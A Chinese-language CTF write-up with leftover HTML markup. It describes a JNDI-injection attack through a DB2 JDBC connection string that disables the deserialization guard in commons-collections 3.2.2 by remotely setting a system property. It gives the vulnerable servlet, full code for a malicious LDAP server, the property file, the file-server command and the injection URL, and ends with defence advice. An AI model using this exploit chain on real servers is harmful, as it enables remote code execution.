Java JDBC (commons-collections 3.2.2) Bypass 技术分析<\/h1>

0x01 题目分析<\/h2>

题目背景<\/h3>
题目来自第四届赣网杯的web5<\/li>
提供一个数据库连接测试页面<\/li>
考点是DB2的JNDI注入<\/li> <\/ul>
关键依赖<\/h3>
commons-collections-3.2.2.jar<\/code> - 存在反序列化限制<\/li>
commons-configuration<\/code> - 提供可利用的类<\/li>
tomcat-jdbc<\/code> - 提供可利用的工厂类<\/li>
<\/ul>
限制条件<\/h3>


CC3链限制<\/strong>：<\/p>

commons-collections-3.2.2<\/code>版本对CC3反序列化的类做了限制<\/li>
关键类如InstantiateTransformer<\/code>、InvokeTransformer<\/code>无法被反序列化<\/li>
限制检查在FunctorUtils.checkUnsafeSerialization<\/code>方法中实现<\/li>
<\/ul>
<\/li>

JDK版本限制<\/strong>：<\/p>

高版本JDK对RMI和LDAP做了限制<\/li>
RMI限制始于6u132, 7u122, 8u113<\/li>
LDAP限制始于11.0.1, 8u191, 7u201, 6u211<\/li>
<\/ul>
<\/li>

Tomcat限制<\/strong>：<\/p>

Tomcat 8.5.96修复了org.apache.naming.factory.BeanFactory<\/code>的利用方式<\/li>
<\/ul>
<\/li>
<\/ol>
0x02 利用思路<\/h2>
关键发现<\/h3>


可利用类<\/strong>：<\/p>

org.apache.tomcat.jdbc.naming.GenericNamingResourcesFactory#getObjectInstance<\/code>

可以加载类并进行无参实例化<\/li>
可以调用setter方法<\/li>
<\/ul>
<\/li>
org.apache.commons.configuration.SystemConfiguration<\/code>

setSystemProperties<\/code>方法可以远程加载配置文件设置系统属性<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

绕过思路<\/strong>：<\/p>

利用SystemConfiguration<\/code>修改系统属性org.apache.commons.collections.enableUnsafeSerialization<\/code>为true<\/code><\/li>
这样就能绕过commons-collections-3.2.2<\/code>的反序列化限制<\/li>
然后正常使用CC3链进行攻击<\/li>
<\/ul>
<\/li>
<\/ol>
攻击流程<\/h3>

通过LDAP服务返回一个恶意的Reference<\/code>对象<\/li>
利用GenericNamingResourcesFactory<\/code>加载SystemConfiguration<\/code><\/li>
SystemConfiguration<\/code>从远程加载配置文件设置系统属性<\/li>
设置org.apache.commons.collections.enableUnsafeSerialization=true<\/code><\/li>
之后就可以正常使用CC3链进行反序列化攻击<\/li>
<\/ol>
0x03 环境搭建<\/h2>
Maven依赖<\/h3>
<dependency><\/span>
<\/span><\/span>    <groupId><\/span>commons-collections<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>commons-collections<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>3.2.2<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>commons-configuration<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>commons-configuration<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>1.8<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>commons-lang<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>commons-lang<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>2.6<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>commons-logging<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>commons-logging<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>1.1.3<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>com.ibm.db2.jcc<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>db2jcc<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>db2jcc4<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>JSP页面 (index.jsp)<\/h3>
<%@ page language="java" contentType="text\/html; charset=UTF-8" pageEncoding="UTF-8"%>
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Test Connect Form<\/title>
<\/head>
<body>
<h2>Test Connect Form<\/h2>
<form action="TestDBConnection" method="post">
    <label for="connectionString">URL:<\/label><br>
    <input type="text" id="connectionString" name="connectionString" required><br>
    <label for="username">Username:<\/label><br>
    <input type="text" id="username" name="username" required><br>
    <label for="password">Password:<\/label><br>
    <input type="password" id="password" name="password" required><br>
    <input type="submit" value="submit">
<\/form>
<\/body>
<\/html>
<\/code><\/pre>
数据库连接Servlet (TestDBConnection.java)<\/h3>
import<\/span> java.io.IOException;<\/span>
<\/span><\/span>import<\/span> java.io.PrintWriter;<\/span>
<\/span><\/span>import<\/span> java.sql.Connection;<\/span>
<\/span><\/span>import<\/span> java.sql.DriverManager;<\/span>
<\/span><\/span>import<\/span> java.sql.SQLException;<\/span>
<\/span><\/span>import<\/span> javax.naming.InitialContext;<\/span>
<\/span><\/span>import<\/span> javax.naming.NamingException;<\/span>
<\/span><\/span>import<\/span> javax.servlet.ServletException;<\/span>
<\/span><\/span>import<\/span> javax.servlet.annotation.WebServlet;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServlet;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServletRequest;<\/span>
<\/span><\/span>import<\/span> javax.servlet.http.HttpServletResponse;<\/span>
<\/span><\/span>
<\/span><\/span>@WebServlet<\/span>(<\/span>"\/TestDBConnection"<\/span>)<\/span>
<\/span><\/span>public<\/span> class<\/span> TestDBConnection<\/span> extends<\/span> HttpServlet {<\/span>
<\/span><\/span>    private<\/span> static<\/span> final<\/span> long<\/span> serialVersionUID =<\/span> 1L<\/span>;<\/span>
<\/span><\/span>
<\/span><\/span>    protected<\/span> void<\/span> doPost<\/span>(<\/span>HttpServletRequest request,<\/span> HttpServletResponse response)<\/span> throws<\/span> ServletException,<\/span> IOException {<\/span>
<\/span><\/span>        response.<\/span>setContentType<\/span>(<\/span>"text\/html;charset=UTF-8"<\/span>);<\/span>
<\/span><\/span>        PrintWriter out =<\/span> response.<\/span>getWriter<\/span>();<\/span>
<\/span><\/span>        
<\/span><\/span>        String connectionString =<\/span> request.<\/span>getParameter<\/span>(<\/span>"connectionString"<\/span>);<\/span>
<\/span><\/span>        String username =<\/span> request.<\/span>getParameter<\/span>(<\/span>"username"<\/span>);<\/span>
<\/span><\/span>        String password =<\/span> request.<\/span>getParameter<\/span>(<\/span>"password"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            \/\/ 加载DB2 JDBC驱动
<\/span><\/span><\/span><\/span>            Class.<\/span>forName<\/span>(<\/span>"com.ibm.db2.jcc.DB2Driver"<\/span>);<\/span>
<\/span><\/span>            \/\/ 尝试建立数据库连接
<\/span><\/span><\/span><\/span>            Connection connection =<\/span> DriverManager.<\/span>getConnection<\/span>(<\/span>connectionString,<\/span> username,<\/span> password);<\/span>
<\/span><\/span>            \/\/ 如果成功连接,则输出成功消息
<\/span><\/span><\/span><\/span>            out.<\/span>println<\/span>(<\/span>"<html><body><h2>连接成功!<\/h2><\/body><\/html>"<\/span>);<\/span>
<\/span><\/span>            \/\/ 关闭连接
<\/span><\/span><\/span><\/span>            connection.<\/span>close<\/span>();<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>ClassNotFoundException |<\/span> SQLException e)<\/span> {<\/span>
<\/span><\/span>            \/\/ 如果连接失败,则输出错误消息
<\/span><\/span><\/span><\/span>            out.<\/span>println<\/span>(<\/span>"<html><body><h2>连接失败!<\/h2><p>"<\/span> +<\/span> e.<\/span>getMessage<\/span>()<\/span> +<\/span> "<\/p><\/body><\/html>"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>NamingException e)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> RuntimeException(<\/span>e);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x04 攻击实现<\/h2>
LDAP服务器代码<\/h3>
import<\/span> com.unboundid.ldap.listener.InMemoryDirectoryServer;<\/span>
<\/span><\/span>import<\/span> com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;<\/span>
<\/span><\/span>import<\/span> com.unboundid.ldap.listener.InMemoryListenerConfig;<\/span>
<\/span><\/span>import<\/span> com.unboundid.ldap.listener.interceptor.InMemoryInterceptedSearchResult;<\/span>
<\/span><\/span>import<\/span> com.unboundid.ldap.listener.interceptor.InMemoryOperationInterceptor;<\/span>
<\/span><\/span>import<\/span> com.unboundid.ldap.sdk.Entry;<\/span>
<\/span><\/span>import<\/span> com.unboundid.ldap.sdk.LDAPResult;<\/span>
<\/span><\/span>import<\/span> com.unboundid.ldap.sdk.ResultCode;<\/span>
<\/span><\/span>import<\/span> javax.naming.Reference;<\/span>
<\/span><\/span>import<\/span> javax.naming.StringRefAddr;<\/span>
<\/span><\/span>import<\/span> javax.net.ServerSocketFactory;<\/span>
<\/span><\/span>import<\/span> javax.net.SocketFactory;<\/span>
<\/span><\/span>import<\/span> javax.net.ssl.SSLSocketFactory;<\/span>
<\/span><\/span>import<\/span> java.net.InetAddress;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> LDAPServer<\/span> {<\/span>
<\/span><\/span>    static<\/span> String userDN =<\/span> "dc=ldap;dc=com"<\/span>;<\/span>
<\/span><\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        System.<\/span>setProperty<\/span>(<\/span>"org.apache.commons.collections.enableUnsafeSerialization"<\/span>,<\/span>"true"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        InMemoryDirectoryServerConfig imConfig =<\/span> new<\/span> InMemoryDirectoryServerConfig(<\/span>userDN);<\/span>
<\/span><\/span>        imConfig.<\/span>setListenerConfigs<\/span>(<\/span>new<\/span> InMemoryListenerConfig(<\/span>
<\/span><\/span>            "listen"<\/span>,<\/span> 
<\/span><\/span>            InetAddress.<\/span>getByName<\/span>(<\/span>"0.0.0.0"<\/span>),<\/span>
<\/span><\/span>            1379<\/span>,<\/span> 
<\/span><\/span>            ServerSocketFactory.<\/span>getDefault<\/span>(),<\/span> 
<\/span><\/span>            SocketFactory.<\/span>getDefault<\/span>(),<\/span> 
<\/span><\/span>            (<\/span>SSLSocketFactory)<\/span>SSLSocketFactory.<\/span>getDefault<\/span>())<\/span>
<\/span><\/span>        );<\/span>
<\/span><\/span>        imConfig.<\/span>addInMemoryOperationInterceptor<\/span>(<\/span>new<\/span> LdapInterpetor());<\/span>
<\/span><\/span>        
<\/span><\/span>        InMemoryDirectoryServer ldapServer =<\/span> new<\/span> InMemoryDirectoryServer(<\/span>imConfig);<\/span>
<\/span><\/span>        ldapServer.<\/span>startListening<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>
<\/span><\/span>    static<\/span> class<\/span> LdapInterpetor<\/span> extends<\/span> InMemoryOperationInterceptor {<\/span>
<\/span><\/span>        private<\/span> static<\/span> Reference systemConfiguration<\/span>(){<\/span>
<\/span><\/span>            Reference ref =<\/span> new<\/span> Reference(<\/span>
<\/span><\/span>                "org.apache.commons.configuration.SystemConfiguration"<\/span>,<\/span>
<\/span><\/span>                "org.apache.tomcat.jdbc.naming.GenericNamingResourcesFactory"<\/span>,<\/span> 
<\/span><\/span>                null<\/span>
<\/span><\/span>            );<\/span>
<\/span><\/span>            ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"SystemProperties"<\/span>,<\/span> "http:\/\/127.0.0.1:6666\/system.txt"<\/span>));<\/span>
<\/span><\/span>            return<\/span> ref;<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>
<\/span><\/span>        private<\/span> static<\/span> byte<\/span>[]<\/span> serializeObject<\/span>(<\/span>Serializable obj)<\/span> {<\/span>
<\/span><\/span>            try<\/span> (<\/span>ByteArrayOutputStream bos =<\/span> new<\/span> ByteArrayOutputStream();<\/span>
<\/span><\/span>                 ObjectOutputStream oos =<\/span> new<\/span> ObjectOutputStream(<\/span>bos))<\/span> {<\/span>
<\/span><\/span>                oos.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>                return<\/span> bos.<\/span>toByteArray<\/span>();<\/span>
<\/span><\/span>            }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>                e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>                return<\/span> null<\/span>;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>
<\/span><\/span>        @Override<\/span>
<\/span><\/span>        public<\/span> void<\/span> processSearchResult<\/span>(<\/span>InMemoryInterceptedSearchResult request)<\/span> {<\/span>
<\/span><\/span>            Entry entry =<\/span> new<\/span> Entry(<\/span>request.<\/span>getRequest<\/span>().<\/span>getBaseDN<\/span>());<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"start"<\/span>);<\/span>
<\/span><\/span>                String className =<\/span> "java.lang.String"<\/span>;<\/span>
<\/span><\/span>                entry.<\/span>addAttribute<\/span>(<\/span>"javaSerializedData"<\/span>,<\/span> serializeObject(<\/span>systemConfiguration()));<\/span>
<\/span><\/span>                entry.<\/span>addAttribute<\/span>(<\/span>"javaClassName"<\/span>,<\/span>className);<\/span>
<\/span><\/span>                entry.<\/span>addAttribute<\/span>(<\/span>"objectClass"<\/span>,<\/span>"javaNamingReference"<\/span>);<\/span>
<\/span><\/span>                request.<\/span>sendSearchEntry<\/span>(<\/span>entry);<\/span>
<\/span><\/span>                request.<\/span>setResult<\/span>(<\/span>new<\/span> LDAPResult(<\/span>0<\/span>,<\/span> ResultCode.<\/span>SUCCESS<\/span>));<\/span>
<\/span><\/span>                System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>"stop"<\/span>);<\/span>
<\/span><\/span>            }<\/span>catch<\/span> (<\/span>Exception e){<\/span>
<\/span><\/span>                e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>配置文件内容 (system.txt)<\/h3>
org.apache.commons.collections.enableUnsafeSerialization=true
<\/code><\/pre>
启动文件服务器<\/h3>
python -m http.server 6666<\/span>
<\/span><\/span><\/code><\/pre>攻击Payload<\/h3>
使用DB2的JNDI注入payload格式：<\/p>
jdbc:db2:\/\/127.0.0.1:50001\/db:clientRerouteServerListJNDIName=ldap:\/\/127.0.0.1:1379\/abc
<\/code><\/pre>
0x05 技术总结<\/h2>


关键点<\/strong>：<\/p>

利用GenericNamingResourcesFactory<\/code>加载SystemConfiguration<\/code><\/li>
SystemConfiguration<\/code>可以远程设置系统属性<\/li>
设置org.apache.commons.collections.enableUnsafeSerialization=true<\/code>绕过CC3限制<\/li>
<\/ul>
<\/li>

利用条件<\/strong>：<\/p>

目标使用commons-collections-3.2.2<\/code><\/li>
目标包含commons-configuration<\/code>依赖<\/li>
目标使用Tomcat JDBC连接池<\/li>
<\/ul>
<\/li>

防御建议<\/strong>：<\/p>

升级commons-collections<\/code>到安全版本<\/li>
限制JDBC连接字符串的输入<\/li>
禁用不必要的JNDI查找功能<\/li>
使用高版本JDK并配置安全策略<\/li>
<\/ul>
<\/li>
<\/ol>